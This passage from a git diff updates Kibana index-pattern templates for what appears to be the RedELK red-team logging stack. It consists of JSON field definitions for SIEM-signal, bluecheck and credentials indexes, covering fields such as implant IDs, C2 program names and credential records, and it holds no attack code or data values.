keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.classification\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.description.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"vulnerability.description\"}}},{\"count\":0,\"name\":\"vulnerability.enumeration\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.report_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.scanner.vendor\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.base\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.environmental\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.temporal\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "timeFieldName": "@timestamp", "title": ".siem-signals-*"}, "coreMigrationVersion": "7.16.3", "id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171872765, 241], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_bluecheck.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_bluecheck.ndjson index d4589aba..28c67c82 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_bluecheck.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_bluecheck.ndjson @@ -1 +1 @@ -{"attributes": {"fieldFormatMap": "{\"implant.log_file\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}}}", "fields": "[{\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"@version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"@version\"}}},{\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_score\",\"type\":\"number\",\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"bluechecktimestamp\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"bluechecktimestamp.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"bluechecktimestamp\"}}},{\"name\":\"bluechecktype\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"bluechecktype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"bluechecktype\"}}},{\"name\":\"classifier\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"classifier.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"classifier\"}}},{\"name\":\"domain\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"domain.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"domain\"}}},{\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"ecs.version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"ecs.version\"}}},{\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.type\"}}},{\"name\":\"implant.id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"implant.id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"implant.id\"}}},{\"name\":\"implant.log_file\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"implant.log_file.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"implant.log_file\"}}},{\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infra.attack_scenario.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infra.attack_scenario\"}}},{\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message\"}}},{\"name\":\"path\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"path.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"path\"}}},{\"name\":\"pstools.psx.edr_name\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"pstools.psx.edr_name.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"pstools.psx.edr_name\"}}},{\"name\":\"pstools.psx.security_products\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"pstools.psx.security_products.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"pstools.psx.security_products\"}}},{\"name\":\"pstools.tool\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"pstools.tool.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"pstools.tool\"}}},{\"name\":\"results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"results\"}}},{\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"tags.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"tags\"}}},{\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"type\"}}}]", "timeFieldName": "@timestamp", "title": "bluecheck-*"}, "coreMigrationVersion": "7.16.2", "id": "bluecheck", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152837408, 1663], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fieldAttrs": "{\"bluecheck.sectools.Product\":{\"count\":1},\"bluechecktype\":{\"count\":1}}", "fields": "[]", "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", "title": "bluecheck-*", "typeMeta": "{}"}, "coreMigrationVersion": "7.16.3", "id": "972368b0-7b90-11ec-9471-7f985bde469d", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1644504089054, 308], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_credentials.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_credentials.ndjson index 35dc0ff9..4959e210 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_credentials.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_credentials.ndjson @@ -1 +1 @@ -{"attributes": {"fields": "[{\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"@version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"@version\"}}},{\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_score\",\"type\":\"number\",\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.ephemeral_id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.ephemeral_id\"}}},{\"name\":\"agent.hostname\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.hostname.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.hostname\"}}},{\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.id\"}}},{\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.name.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.name\"}}},{\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.type\"}}},{\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.version\"}}},{\"name\":\"c2.log.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"c2.log.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"c2.log.type\"}}},{\"name\":\"c2.program\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"c2.program.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"c2.program\"}}},{\"name\":\"creds.credential\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.credential.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.credential\"}}},{\"name\":\"creds.host\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.host.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.host\"}}},{\"name\":\"creds.realm\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.realm.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.realm\"}}},{\"name\":\"creds.source\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.source.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.source\"}}},{\"name\":\"creds.username\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.username.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.username\"}}},{\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"ecs.version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"ecs.version\"}}},{\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.action.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.action\"}}},{\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.category.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.category\"}}},{\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.dataset.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.dataset\"}}},{\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.kind.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.kind\"}}},{\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.module.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.module\"}}},{\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.type\"}}},{\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infra.attack_scenario.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infra.attack_scenario\"}}},{\"name\":\"infra.log.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infra.log.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infra.log.type\"}}},{\"name\":\"input.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"input.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"input.type\"}}},{\"name\":\"log.file.path\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"log.file.path.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"log.file.path\"}}},{\"name\":\"log.offset\",\"type\":\"number\",\"esTypes\":[\"long\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message\"}}},{\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"tags.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"tags\"}}}]", "timeFieldName": "@timestamp", "title": "credentials-*"}, "coreMigrationVersion": "7.16.2", "id": "credentials", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152839362, 1858], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fields": "[{\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"@version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"@version\"}}},{\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_score\",\"type\":\"number\",\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.ephemeral_id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.ephemeral_id\"}}},{\"name\":\"agent.hostname\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.hostname.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.hostname\"}}},{\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.id\"}}},{\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"text\"],